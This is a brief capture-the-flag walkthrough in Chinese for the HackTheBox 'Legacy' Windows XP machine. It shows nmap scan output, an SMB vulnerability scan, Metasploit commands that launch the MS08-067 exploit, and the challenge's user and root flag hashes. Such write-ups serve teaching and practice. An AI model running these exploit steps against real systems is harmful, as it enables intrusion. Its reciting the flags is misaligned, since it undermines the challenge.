信息收集

IP Address	Opening Ports
10.10.10.4	TCP:135,139,445

$ nmap -p- 10.10.10.4 --min-rate 1000 -sC -sV -Pn

PORT      STATE    SERVICE      VERSION
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds Windows XP microsoft-ds
1715/tcp  filtered houdini-lm
2790/tcp  filtered plgproxy
3485/tcp  filtered celatalk
4181/tcp  filtered macbak
8317/tcp  filtered unknown
16417/tcp filtered unknown
35682/tcp filtered unknown
37634/tcp filtered unknown
59296/tcp filtered unknown
59458/tcp filtered unknown
62000/tcp filtered unknown
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xpHost script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-08-28T14:59:28+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:2b:f1 (VMware)
|_clock-skew: mean: 5d00h18m08s, deviation: 2h07m16s, median: 4d22h48m08s

nmap 漏洞扫描脚本深度发现 & MS08-067

$ nmap --script smb-vuln* -p 445 10.10.10.4

MS17-010 和 MS08-067似乎存在这个系统

$ msfconsole

msf6 > use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.16.24

msf6 exploit(windows/smb/ms08_067_netapi) > run

附录:

可以通过上传whoami.exe来执行用户名查询

User.txt

e69af0e4f443de7e36876fda4ec7644f

Root.txt

993442d258b0e0ec917cae9e695d5713